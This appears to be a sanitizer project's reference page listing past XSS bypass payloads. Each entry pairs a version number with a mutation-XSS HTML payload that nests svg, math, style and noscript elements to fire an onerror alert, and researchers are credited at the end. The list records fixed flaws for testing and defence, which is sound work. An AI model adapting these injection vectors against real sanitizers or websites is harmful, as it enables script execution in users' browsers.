XSS
This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples, but to avoid redundancy we add only those that include new vectors or techniques.
2.0.0
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
2.0.17
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
2.0.17
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
2.0.17
<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>
2.2.0
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
2.2.3
<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">
3.0.8
<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">
3.1.0
n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;
N/A
3.1.7
<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.
3.1.0
<noscript><style></noscript><img src=x onerror=alert(1)>
3.1.1
<svg><style><img src=x onerror=alert(1)>
3.2.3
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
v20190215
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
Michał Bentkowski
Michał Bentkowski
Gareth Heyes
@web_payload team
Daniel Santos
Michał Bentkowski
Kévin - Mizu
Masato Kinugawa
Yaniv Nizry
Yaniv Nizry
Yaniv Nizry
Masato Kinugawa